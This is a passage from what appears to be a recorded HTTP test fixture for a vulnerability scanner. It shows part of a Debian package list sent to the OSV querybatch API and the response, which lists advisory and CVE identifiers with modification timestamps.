"name": "perl-modules-5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "pgdg-keyring" }, "version": "2018.2" }, { "package": { "ecosystem": "Debian", "name": "pinentry-curses" }, "version": "1.0.0-2" }, { "package": { "ecosystem": "Debian", "name": "postgresql-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-11" }, "version": "11.15-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-client-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "postgresql-common" }, "version": "238.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "readline-common" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "sed" }, "version": "4.4-1" }, { "package": { "ecosystem": "Debian", "name": "sensible-utils" }, "version": "0.0.9+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "ssl-cert" }, "version": "1.0.39" }, { "package": { "ecosystem": "Debian", "name": "sysvinit-utils" }, "version": "2.88dsf-59.9" }, { "package": { "ecosystem": "Debian", "name": "tar" }, "version": "1.29b-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "tzdata" }, "version": "2021a-0+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "ucf" }, "version": "3.0036" }, { "package": { "ecosystem": "Debian", "name": "util-linux" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "xz-utils" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zlib1g" }, "version": "1:1.2.8.dfsg-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "zstd" }, "version": "1.1.2-1+deb9u1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_multiple_files url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 21542 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-3374", "modified": "2026-03-17T02:42:42.368242Z" }, { "id": "DEBIAN-CVE-2018-0501", "modified": "2025-11-19T02:04:24.786271Z" }, { "id": "DEBIAN-CVE-2019-3462", "modified": "2025-11-19T02:02:50.288367Z" }, { "id": "DEBIAN-CVE-2020-27350", "modified": "2025-11-19T01:06:21.507844Z" }, { "id": "DEBIAN-CVE-2020-3810", "modified": "2025-11-19T01:08:53.168851Z" }, { "id": "DSA-4685-1", "modified": "2026-03-09T02:09:03.263738Z" }, { "id": "DSA-4808-1", "modified": "2026-03-09T02:11:17.119108Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-18276", "modified": "2025-11-19T01:19:06.470662Z" }, { "id": "DEBIAN-CVE-2022-3715", "modified": "2026-03-17T02:47:45.184492Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-2781", "modified": "2026-03-17T02:44:35.752995Z" }, { "id": "DEBIAN-CVE-2017-18018", "modified": "2026-03-17T02:45:06.555217Z" }, { "id": "DEBIAN-CVE-2024-0684", "modified": "2025-11-19T01:02:00.374806Z" }, { "id": "DEBIAN-CVE-2025-5278", "modified": "2026-03-17T02:52:23.723753Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": "2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1664", "modified": "2025-11-20T10:15:48.083782Z" }, { "id": "DEBIAN-CVE-2025-6297", "modified": "2026-03-17T02:50:41.230667Z" }, { "id": "DEBIAN-CVE-2026-2219", "modified": "2026-03-14T15:06:12.109941Z" }, { "id": "DLA-3022-1", "modified": "2026-03-09T01:23:37.553205Z" }, { "id": "DSA-5147-1", "modified": "2026-03-09T02:10:11.335992Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-5094", "modified": "2025-11-19T02:02:52.019166Z" }, { "id": "DEBIAN-CVE-2019-5188", "modified": "2025-11-19T01:01:51.904490Z" }, { "id": "DEBIAN-CVE-2022-1304", "modified": "2025-11-20T10:15:47.847878Z" }, { "id": "DLA-3910-1", "modified": "2026-03-09T01:22:32.343795Z" }, { "id": "DSA-4535-1", "modified": "2026-03-09T02:10:12.902574Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-9493-h29p-rfm2", "modified": "2026-02-04T03:47:55.536228Z" }, { "id": "GHSA-cgrx-mc8f-2prm", "modified": "2026-02-04T02:50:45.342760Z" }, { "id": "GHSA-f3fp-gc8g-vw66", "modified": "2026-02-04T04:15:59.735117Z" }, { "id": "GHSA-g2j6-57v7-gm8c", "modified": "2026-02-04T02:43:58.212471Z" }, { "id": "GHSA-jfvp-7x6p-h2pv", "modified": "2026-02-04T03:12:37.981869Z" }, { "id": "GHSA-m8cg-xc2p-r3fc", "modified": "2026-02-04T03:29:19.767788Z" }, { "id": "GHSA-qw9x-cqr3-wc7r", "modified": "2026-02-04T02:13:22.313241Z" }, { "id": "GHSA-v95c-p5hm-xq8f", "modified": "2026-03-13T22:16:11.684125Z" }, { "id": "GHSA-vpvm-3wq2-2wvm", "modified": "2026-02-04T02:53:37.613379Z" }, { "id": "GHSA-xr7r-f8xq-vfvv", "modified": "2026-02-04T03:18:48.377509Z" }, { "id": "GO-2022-0274", "modified": "2026-02-04T02:26:28.343240Z" }, { "id": "GO-2022-0452", "modified": "2026-02-04T03:17:02.340230Z" }, { "id": "GO-2023-1627", "modified": "2026-02-04T03:58:42.107712Z" }, { "id": "GO-2023-1682", "modified": "2026-02-04T02:59:23.815900Z" }, { "id": "GO-2023-1683", "modified": "2026-02-04T04:01:58.343687Z" }, { "id": "GO-2024-2491", "modified": "2026-02-04T02:39:00.262696Z" }, { "id": "GO-2024-3110", "modified": "2026-02-04T02:23:26.560077Z" }, { "id": "GO-2025-4096", "modified": "2026-02-04T03:11:33.546218Z" }, { "id": "GO-2025-4097", "modified": "2026-02-04T03:00:55.376695Z" }, { "id": "GO-2025-4098", "modified": "2026-02-04T02:52:46.004719Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-p782-xgp4-8hr8", "modified": "2026-02-04T04:15:14.486111Z" }, { "id": "GO-2022-0493", "modified": "2026-02-04T03:42:54.589715Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DSA-5122-1", "modified": "2026-03-09T02:09:10.163691Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-0379", "modified": "2025-11-19T01:06:25.120079Z" }, { "id": "DEBIAN-CVE-2017-7526", "modified": "2025-11-19T02:04:40.318681Z" }, { "id": "DEBIAN-CVE-2018-0495", "modified": "2025-11-19T02:04:27.207183Z" }, { "id": "DEBIAN-CVE-2018-6829", "modified": "2026-03-10T05:05:47.263837Z" }, { "id": "DEBIAN-CVE-2019-13627", "modified": "2025-11-19T01:12:35.581705Z" }, { "id": "DEBIAN-CVE-2021-33560", "modified": "2026-03-10T05:07:08.938163Z" }, { "id": "DEBIAN-CVE-2021-40528", "modified": "2025-11-19T01:01:59.995618Z" }, { "id": "DEBIAN-CVE-2024-2236", "modified": "2026-03-10T05:09:58.705229Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-10790", "modified": "2025-11-19T01:01:57.855157Z" }, { "id": "DEBIAN-CVE-2018-1000654", "modified": "2025-11-19T02:02:40.642360Z" }, { "id": "DEBIAN-CVE-2018-6003", "modified": "2025-11-19T01:06:22.990063Z" }, { "id": "DEBIAN-CVE-2021-46848", "modified": "2025-11-20T10:15:14.681077Z" }, { "id": "DEBIAN-CVE-2024-12133", "modified": "2025-11-20T10:17:02.620233Z" }, { "id": "DEBIAN-CVE-2025-13151", "modified": "2026-01-20T05:13:20.502324Z" }, { "id": "DLA-3263-1", "modified": "2026-03-09T01:22:34.273046Z" }, { "id": "DLA-4061-1", "modified": "2026-03-09T01:20:16.124977Z" }, { "id": "DSA-5863-1", "modified": "2026-03-09T02:08:50.747280Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-3709", "modified": "2025-11-20T10:12:11.931996Z" }, { "id": "DEBIAN-CVE-2016-9318", "modified": "2025-11-19T02:02:45.582059Z" }, { "id": "DEBIAN-CVE-2017-0663", "modified": "2025-11-19T02:02:52.056836Z" }, { "id": "DEBIAN-CVE-2017-15412", "modified": "2025-11-19T01:08:49.499099Z" }, { "id": "DEBIAN-CVE-2017-16931", "modified": "2025-11-19T02:04:25.542166Z" }, { "id": "DEBIAN-CVE-2017-16932", "modified": "2025-11-19T01:04:39.458229Z" }, { "id": "DEBIAN-CVE-2017-18258", "modified": "2025-11-19T01:08:48.927062Z" }, { "id": "DEBIAN-CVE-2017-5130", "modified": "2025-11-19T01:03:12.822124Z" }, { "id": "DEBIAN-CVE-2017-5969", "modified": "2025-11-19T01:08:52.062516Z" }, { "id": "DEBIAN-CVE-2017-7375", "modified": "2025-11-19T02:02:48.011785Z" }, { "id": "DEBIAN-CVE-2017-7376", "modified": "2025-11-19T02:01:17.016443Z" }, { "id": "DEBIAN-CVE-2017-8872", "modified": "2025-11-19T02:04:31.920669Z" }, { "id": "DEBIAN-CVE-2017-9047", "modified": "2025-11-19T02:04:30.335407Z" }, { "id": "DEBIAN-CVE-2017-9048", "modified": "2025-11-19T01:19:09.303210Z" }, { "id": "DEBIAN-CVE-2017-9049", "modified": "2025-11-19T01:03:12.259406Z" }, { "id": "DEBIAN-CVE-2017-9050", "modified": "2025-11-19T01:08:53.069573Z" }, { "id": "DEBIAN-CVE-2018-14404", "modified": "2025-11-19T01:12:32.274520Z" }, { "id": "DEBIAN-CVE-2018-14567", "modified": "2025-11-19T01:08:49.660035Z" }, { "id": "DEBIAN-CVE-2019-19956", "modified": "2025-11-19T02:01:17.970372Z" }, { "id": "DEBIAN-CVE-2019-20388", "modified": "2025-11-19T02:04:37.363509Z" }, { "id": "DEBIAN-CVE-2020-24977", "modified": "2025-11-19T02:04:41.266003Z" }, { "id": "DEBIAN-CVE-2020-7595", "modified": "2025-11-19T02:04:29.271836Z" }, { "id": "DEBIAN-CVE-2021-3516", "modified": "2025-11-19T02:01:14.946107Z" }, { "id": "DEBIAN-CVE-2021-3517", "modified": "2025-11-19T01:12:34.981900Z" }, { "id": "DEBIAN-CVE-2021-3518", "modified": "2025-11-19T01:19:08.645337Z" }, { "id": "DEBIAN-CVE-2021-3537", "modified": "2025-11-19T02:04:30.248276Z" }, { "id": "DEBIAN-CVE-2021-3541", "modified": "2025-11-19T02:04:36.614917Z" }, { "id": "DEBIAN-CVE-2022-2309", "modified": "2025-11-20T10:15:28.694644Z" }, { "id": "DEBIAN-CVE-2022-23308", "modified": "2025-11-20T10:15:29.029152Z" }, { "id": "DEBIAN-CVE-2022-29824", "modified": "2025-11-20T10:15:52.814213Z" }, { "id": "DEBIAN-CVE-2022-40303", "modified": "2025-11-20T10:16:01.982632Z" }, { "id": "DEBIAN-CVE-2022-40304", "modified": "2025-11-20T10:16:01.918054Z" }, { "id": "DEBIAN-CVE-2022-49043", "modified": "2025-11-20T10:16:12.358770Z" }, { "id": "DEBIAN-CVE-2023-28484", "modified": "2025-11-20T10:16:35.199991Z" }, { "id": "DEBIAN-CVE-2023-29469", "modified": "2025-11-20T10:17:34.943682Z" }, { "id": "DEBIAN-CVE-2023-39615", "modified": "2025-11-20T10:16:41.593841Z" }, { "id": "DEBIAN-CVE-2023-45322", "modified": "2025-11-20T10:16:44.891362Z" }, { "id": "DEBIAN-CVE-2024-25062", "modified": "2025-11-20T10:17:04.986212Z" }, { "id": "DEBIAN-CVE-2024-34459", "modified": "2025-11-20T10:17:41.570595Z" }, { "id": "DEBIAN-CVE-2024-56171", "modified": "2025-11-20T10:17:48.605695Z" }, { "id": "DEBIAN-CVE-2025-24928", "modified": "2025-11-20T10:18:05.778161Z" }, { "id": "DEBIAN-CVE-2025-27113", "modified": "2025-11-20T10:18:06.358243Z" }, { "id": "DEBIAN-CVE-2025-32414", "modified": "2025-11-20T10:18:08.076077Z" }, { "id": "DEBIAN-CVE-2025-32415", "modified": "2025-11-20T10:18:08.251077Z" }, { "id": "DEBIAN-CVE-2025-49794", "modified": "2025-11-20T10:18:23.322205Z" }, { "id": "DEBIAN-CVE-2025-49796", "modified": "2025-11-20T10:18:23.585429Z" }, { "id": "DEBIAN-CVE-2025-6021", "modified": "2025-11-20T10:18:26.314947Z" }, { "id": "DEBIAN-CVE-2025-6170", "modified": "2025-11-20T10:18:26.670728Z" }, { "id": "DEBIAN-CVE-2025-8732", "modified": "2025-12-14T10:13:26.467517Z" }, { "id": "DEBIAN-CVE-2025-9714", "modified": "2026-01-10T14:08:12.148171Z" }, { "id": "DEBIAN-CVE-2026-0989", "modified": "2026-01-16T11:05:07.928323Z" }, { "id": "DEBIAN-CVE-2026-0990", "modified": "2026-01-16T11:05:23.527352Z" }, { "id": "DEBIAN-CVE-2026-0992", "modified": "2026-01-16T11:05:10.515041Z" }, { "id": "DEBIAN-CVE-2026-1757", "modified": "2026-02-03T11:16:44.779248Z" }, { "id": "DLA-3012-1", "modified": "2026-03-09T01:20:46.878115Z" }, { "id": "DLA-3172-1", "modified": "2026-03-09T01:19:54.747665Z" }, { "id": "DLA-3405-1", "modified": "2026-03-09T01:01:29.748040Z" }, { "id": "DLA-3878-1", "modified": "2026-03-09T01:20:38.676387Z" }, { "id": "DLA-4064-1", "modified": "2026-03-09T01:20:30.558703Z" }, { "id": "DLA-4146-1", "modified": "2026-03-09T01:22:43.732573Z" }, { "id": "DLA-4251-1", "modified": "2026-03-09T02:11:12.986866Z" }, { "id": "DLA-4319-1", "modified": "2025-09-30T22:17:08.381361Z" }, { "id": "DSA-5142-1", "modified": "2026-03-09T02:10:58.737631Z" }, { "id": "DSA-5271-1", "modified": "2026-03-09T02:10:55.154283Z" }, { "id": "DSA-5391-1", "modified": "2026-03-09T02:09:39.164621Z" }, { "id": "DSA-5949-1", "modified": "2026-03-09T02:09:32.257423Z" }, { "id": "DSA-5990-1", "modified": "2025-08-29T13:01:48.117026Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2018-0732", "modified": "2025-11-19T02:02:54.249966Z" }, { "id": "DEBIAN-CVE-2018-0734", "modified": "2025-11-19T02:02:43.768735Z" }, { "id": "DEBIAN-CVE-2018-0735", "modified": "2025-11-19T01:19:04.251217Z" }, { "id": "DEBIAN-CVE-2018-5407", "modified": "2025-11-19T01:02:00.203143Z" }, { "id": "DEBIAN-CVE-2019-1543", "modified": "2025-11-19T01:12:34.981629Z" }, { "id": "DEBIAN-CVE-2019-1547", "modified": "2025-11-19T01:12:35.687253Z" }, { "id": "DEBIAN-CVE-2019-1549", "modified": "2025-11-19T01:04:40.924710Z" }, { "id": "DEBIAN-CVE-2019-1551", "modified": "2025-11-19T01:19:08.067279Z" }, { "id": "DEBIAN-CVE-2019-1563", "modified": "2025-11-19T02:04:34.392400Z" }, { "id": "DEBIAN-CVE-2020-1967", "modified": "2025-11-19T02:04:38.886020Z" }, { "id": "DEBIAN-CVE-2020-1971", "modified": "2025-11-19T02:04:28.520483Z" }, { "id": "DEBIAN-CVE-2021-23840", "modified": "2025-11-19T01:03:14.356310Z" }, { "id": "DEBIAN-CVE-2021-23841", "modified": "2025-11-19T02:02:54.160482Z" }, { "id": "DEBIAN-CVE-2021-3449", "modified": "2025-11-19T01:04:41.495834Z" }, { "id": "DEBIAN-CVE-2021-3450", "modified": "2025-11-19T02:01:16.123253Z" }, { "id": "DEBIAN-CVE-2021-3711", "modified": "2025-11-20T10:15:44.121033Z" }, { "id": "DEBIAN-CVE-2021-3712", "modified": "2025-11-20T10:15:44.130193Z" }, { "id": "DEBIAN-CVE-2021-4160", "modified": "2025-11-20T10:15:10.185497Z" }, { "id": "DEBIAN-CVE-2022-0778", "modified": "2025-11-20T10:15:47.332694Z" }, { "id": "DEBIAN-CVE-2022-1292", "modified": "2025-11-20T10:15:25.471825Z" }, { "id": "DEBIAN-CVE-2022-2068", "modified": "2025-11-20T10:15:27.022420Z" }, { "id": "DEBIAN-CVE-2022-2097", "modified": "2025-11-20T10:15:27.065089Z" }, { "id": "DEBIAN-CVE-2022-2274", "modified": "2025-11-19T02:02:45.418259Z" }, { "id": "DEBIAN-CVE-2022-3358", "modified": "2025-11-19T01:06:25.721124Z" }, { "id": "DEBIAN-CVE-2022-3602", "modified": "2025-11-19T01:12:35.687556Z" }, { "id": "DEBIAN-CVE-2022-3786", "modified": "2025-11-19T01:19:02.748977Z" }, { "id": "DEBIAN-CVE-2022-3996", "modified": "2025-11-19T02:01:16.596616Z" }, { "id": "DEBIAN-CVE-2022-4203", "modified": "2025-11-19T02:01:16.313531Z" }, { "id": "DEBIAN-CVE-2022-4304", "modified": "2025-11-20T10:16:04.313466Z" }, { "id": "DEBIAN-CVE-2022-4450", "modified": "2025-11-20T10:16:05.367442Z" }, { "id": "DEBIAN-CVE-2023-0215", "modified": "2025-11-20T10:16:27.838296Z" }, { "id": "DEBIAN-CVE-2023-0216", "modified": "2025-11-19T02:04:35.947667Z" }, { "id": "DEBIAN-CVE-2023-0217", "modified": "2025-11-19T01:12:37.272749Z" }, { "id": "DEBIAN-CVE-2023-0286", "modified": "2025-11-20T10:16:27.985311Z" }, { "id": "DEBIAN-CVE-2023-0401", "modified": "2025-11-19T01:12:36.298552Z" }, { "id": "DEBIAN-CVE-2023-0464", "modified": "2025-11-20T10:16:28.057931Z" }, { "id": "DEBIAN-CVE-2023-0465", "modified": "2025-11-20T10:16:28.143046Z" }, { "id": "DEBIAN-CVE-2023-0466", "modified": "2025-11-20T10:16:28.053837Z" }, { "id": "DEBIAN-CVE-2023-1255", "modified": "2025-11-19T01:08:49.387669Z" }, { "id": "DEBIAN-CVE-2023-2650", "modified": "2025-11-20T10:17:34.439123Z" }, { "id": "DEBIAN-CVE-2023-2975", "modified": "2025-11-20T10:16:36.112183Z" }, { "id": "DEBIAN-CVE-2023-3446", "modified": "2025-11-20T10:16:38.860251Z" }, { "id": "DEBIAN-CVE-2023-3817", "modified": "2025-11-20T10:17:35.737266Z" }, { "id": "DEBIAN-CVE-2023-5363", "modified": "2025-11-20T10:16:59.430619Z" }, { "id": "DEBIAN-CVE-2023-5678", "modified": "2025-11-20T10:17:38.719690Z" }, { "id": "DEBIAN-CVE-2023-6129", "modified": "2025-11-20T10:17:39.029757Z" }, { "id": "DEBIAN-CVE-2023-6237", "modified": "2025-11-20T10:17:39.218097Z" }, { "id": "DEBIAN-CVE-2024-0727", "modified": "2025-11-20T10:17:01.258658Z" }, { "id": "DEBIAN-CVE-2024-12797", "modified": "2025-11-19T02:04:36.131726Z" }, { "id": "DEBIAN-CVE-2024-13176", "modified": "2026-03-17T02:49:44.824285Z" }, { "id": "DEBIAN-CVE-2024-2511", "modified": "2025-11-20T10:17:05.139581Z" }, { "id": "DEBIAN-CVE-2024-4603", "modified": "2025-11-20T10:17:43.955114Z" }, { "id": "DEBIAN-CVE-2024-4741", "modified": "2025-11-20T10:17:26.990307Z" }, { "id": "DEBIAN-CVE-2024-5535", "modified": "2025-11-20T10:17:48.194687Z" }, { "id": "DEBIAN-CVE-2024-6119", "modified": "2025-11-20T10:17:53.824117Z" }, { "id": "DEBIAN-CVE-2024-9143", "modified": "2025-11-20T10:17:55.864918Z" }, { "id": "DEBIAN-CVE-2025-11187", "modified": "2026-03-17T02:47:10.761659Z" }, { "id": "DEBIAN-CVE-2025-15467", "modified": "2026-03-17T02:51:11.866899Z" }, { "id": "DEBIAN-CVE-2025-15468", "modified": "2026-03-17T02:51:12.304672Z" }, { "id": "DEBIAN-CVE-2025-15469", "modified": "2026-03-17T02:51:12.299847Z" }, { "id": "DEBIAN-CVE-2025-27587", "modified": "2026-03-17T02:51:34.552234Z" }, { "id": "DEBIAN-CVE-2025-4575", "modified": "2025-11-19T02:02:43.971243Z" }, { "id": "DEBIAN-CVE-2025-66199", "modified": "2026-03-17T02:52:26.091887Z" }, { "id": "DEBIAN-CVE-2025-68160", "modified": "2026-03-17T02:50:42.645267Z" }, { "id": "DEBIAN-CVE-2025-69418", "modified": "2026-03-17T02:51:22.404226Z" }, { "id": "DEBIAN-CVE-2025-69419", "modified": "2026-03-17T02:51:22.497785Z" }, { "id": "DEBIAN-CVE-2025-69420", "modified": "2026-03-17T02:51:22.651361Z" }, { "id": "DEBIAN-CVE-2025-69421", "modified": "2026-03-17T02:51:22.561721Z" }, { "id": "DEBIAN-CVE-2025-9230", "modified": "2026-03-17T02:51:39.764914Z" }, { "id": "DEBIAN-CVE-2025-9231", "modified": "2026-03-17T02:51:39.727656Z" }, { "id": "DEBIAN-CVE-2025-9232", "modified": "2026-03-17T02:51:39.882696Z" }, { "id": "DEBIAN-CVE-2026-22795", "modified": "2026-03-17T02:51:47.646020Z" }, { "id": "DEBIAN-CVE-2026-22796", "modified": "2026-03-17T02:51:47.743030Z" }, { "id": "DEBIAN-CVE-2026-2673", "modified": "2026-03-18T09:03:28.363302Z" }, { "id": "DLA-3008-1", "modified": "2026-03-09T01:23:33.375630Z" }, { "id": "DLA-3325-1", "modified": "2026-03-09T01:19:40.983935Z" }, { "id": "DLA-3449-1", "modified": "2026-03-09T01:22:47.322805Z" }, { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" }, { "id": "DLA-3942-1", "modified": "2026-03-09T01:22:40.686044Z" }, { "id": "DLA-3942-2", "modified": "2026-03-09T01:21:01.728730Z" }, { "id": "DLA-4176-1", "modified": "2026-03-09T01:20:23.459313Z" }, { "id": "DLA-4321-1", "modified": "2025-10-03T16:33:24.717173Z" }, { "id": "DLA-4490-1", "modified": "2026-02-23T10:30:28.927832Z" }, { "id": "DSA-4539-1", "modified": "2026-03-09T02:09:20.276054Z" }, { "id": "DSA-4539-3", "modified": "2025-05-26T07:05:14.261652Z" }, { "id": "DSA-4661-1", "modified": "2026-03-09T02:08:53.792348Z" }, { "id": "DSA-4807-1", "modified": "2026-03-09T02:10:20.442914Z" }, { "id": "DSA-4855-1", "modified": "2026-03-09T02:11:29.405206Z" }, { "id": "DSA-4875-1", "modified": "2026-03-09T02:10:05.387501Z" }, { "id": "DSA-4963-1", "modified": "2026-03-09T02:10:15.488747Z" }, { "id": "DSA-5103-1", "modified": "2026-03-09T02:09:42.407559Z" }, { "id": "DSA-5139-1", "modified": "2026-03-09T02:09:17.334653Z" }, { "id": "DSA-5169-1", "modified": "2026-03-09T02:09:37.692763Z" }, { "id": "DSA-5343-1", "modified": "2026-03-09T02:09:47.149297Z" }, { "id": "DSA-5417-1", "modified": "2026-03-09T02:09:39.950679Z" }, { "id": "DSA-5532-1", "modified": "2026-03-09T02:08:31.395482Z" }, { "id": "DSA-5764-1", "modified": "2026-03-09T02:09:02.723874Z" }, { "id": "DSA-6015-1", "modified": "2025-10-01T13:32:01.848986Z" }, { "id": "DSA-6113-1", "modified": "2026-01-27T20:30:04.397078Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-4116", "modified": "2025-11-20T10:10:50.058601Z" }, { "id": "DEBIAN-CVE-2017-12837", "modified": "2025-11-19T01:03:14.361068Z" }, { "id": "DEBIAN-CVE-2017-12883", "modified": "2025-11-19T01:12:38.323688Z" }, { "id": "DEBIAN-CVE-2018-12015", "modified": "2025-11-19T02:02:49.033339Z" }, { "id": "DEBIAN-CVE-2018-18311", "modified": "2025-11-19T01:12:36.918544Z" }, { "id": "DEBIAN-CVE-2018-18312", "modified": "2025-11-19T02:04:33.584277Z" }, { "id": "DEBIAN-CVE-2018-18313", "modified": "2025-11-19T01:06:24.154928Z" }, { "id": "DEBIAN-CVE-2018-18314", "modified": "2025-11-19T01:12:35.416886Z" }, { "id": "DEBIAN-CVE-2018-6797", "modified": "2025-11-19T02:04:23.831823Z" }, { "id": "DEBIAN-CVE-2018-6798", "modified": "2025-11-19T02:02:49.628171Z" }, { "id": "DEBIAN-CVE-2018-6913", "modified": "2025-11-19T02:02:50.593437Z" }, { "id": "DEBIAN-CVE-2020-10543", "modified": "2025-11-19T01:04:39.904198Z" }, { "id": "DEBIAN-CVE-2020-10878", "modified": "2025-11-19T01:12:35.457057Z" }, { "id": "DEBIAN-CVE-2020-12723", "modified": "2025-11-19T02:02:47.094787Z" }, { "id": "DEBIAN-CVE-2020-16156", "modified": "2025-11-20T10:14:36.701112Z" }, { "id": "DEBIAN-CVE-2021-36770", "modified": "2025-11-20T10:15:44.080114Z" }, { "id": "DEBIAN-CVE-2022-48522", "modified": "2025-11-19T01:08:52.915564Z" }, { "id": "DEBIAN-CVE-2023-31484", "modified": "2025-11-20T10:17:35.627220Z" }, { "id": "DEBIAN-CVE-2023-31486", "modified": "2026-03-17T02:48:35.857896Z" }, { "id": "DEBIAN-CVE-2023-47038", "modified": "2025-11-20T10:16:46.343364Z" }, { "id": "DEBIAN-CVE-2024-56406", "modified": "2025-11-20T10:17:48.686371Z" }, { "id": "DEBIAN-CVE-2025-40909", "modified": "2025-11-20T10:18:21.143971Z" }, { "id": "DLA-3926-1", "modified": "2026-03-09T01:20:46.118633Z" }, { "id": "DSA-5902-1", "modified": "2026-03-09T02:09:19.793163Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3072-1", "modified": "2026-03-09T01:22:24.680239Z" }, { "id": "DLA-3189-1", "modified": "2025-05-26T07:01:07.887113Z" }, { "id": "DLA-3316-1", "modified": "2025-05-26T07:01:13.127412Z" }, { "id": "DLA-3422-1", "modified": "2026-03-09T01:20:56.692752Z" }, { "id": "DLA-3600-1", "modified": "2026-03-09T01:17:49.966197Z" }, { "id": "DLA-3651-1", "modified": "2026-03-09T01:18:05.310519Z" }, { "id": "DLA-3764-1", "modified": "2026-03-09T01:23:22.273526Z" }, { "id": "DSA-5135-1", "modified": "2026-03-09T02:11:21.646978Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-17512", "modified": "2025-11-19T02:04:30.656495Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2005-2541", "modified": "2026-03-17T02:42:47.789952Z" }, { "id": "DEBIAN-CVE-2018-20482", "modified": "2025-11-19T02:02:47.070832Z" }, { "id": "DEBIAN-CVE-2019-9923", "modified": "2025-11-19T02:02:53.559001Z" }, { "id": "DEBIAN-CVE-2021-20193", "modified": "2025-11-19T01:01:55.139356Z" }, { "id": "DEBIAN-CVE-2022-48303", "modified": "2025-11-20T10:16:07.552593Z" }, { "id": "DEBIAN-CVE-2023-39804", "modified": "2025-11-20T10:16:41.587973Z" }, { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3051-1", "modified": "2025-05-26T07:01:56.257796Z" }, { "id": "DLA-3134-1", "modified": "2025-05-26T07:01:01.500124Z" }, { "id": "DLA-3161-1", "modified": "2025-05-26T07:01:03.882213Z" }, { "id": "DLA-3366-1", "modified": "2025-05-26T07:01:17.027142Z" }, { "id": "DLA-3412-1", "modified": "2025-05-26T07:01:20.109212Z" }, { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" }, { "id": "DLA-3972-1", "modified": "2025-05-26T07:02:05.284676Z" }, { "id": "DLA-4085-1", "modified": "2025-05-26T07:02:10.958749Z" }, { "id": "DLA-4105-1", "modified": "2025-05-26T07:02:13.921097Z" }, { "id": "DLA-4403-1", "modified": "2025-12-12T10:13:37.154747Z" } ] }, { "vulns": [ { "id": "DLA-4016-1", "modified": "2025-05-26T07:02:06.504254Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2016-2779", "modified": "2025-11-19T01:12:38.591462Z" }, { "id": "DEBIAN-CVE-2018-7738", "modified": "2025-11-20T10:13:54.493707Z" }, { "id": "DEBIAN-CVE-2021-37600", "modified": "2025-11-19T02:02:43.997954Z" }, { "id": "DEBIAN-CVE-2021-3995", "modified": "2025-11-20T10:15:45.587792Z" }, { "id": "DEBIAN-CVE-2021-3996", "modified": "2025-11-20T10:15:45.602424Z" }, { "id": "DEBIAN-CVE-2022-0563", "modified": "2026-03-17T02:46:43.123134Z" }, { "id": "DEBIAN-CVE-2024-28085", "modified": "2025-11-20T10:17:41.612682Z" }, { "id": "DEBIAN-CVE-2025-14104", "modified": "2026-03-05T17:00:58.361610Z" }, { "id": "DEBIAN-CVE-2026-3184", "modified": "2026-02-26T09:30:44.219098Z" }, { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" }, { "id": "DSA-5055-1", "modified": 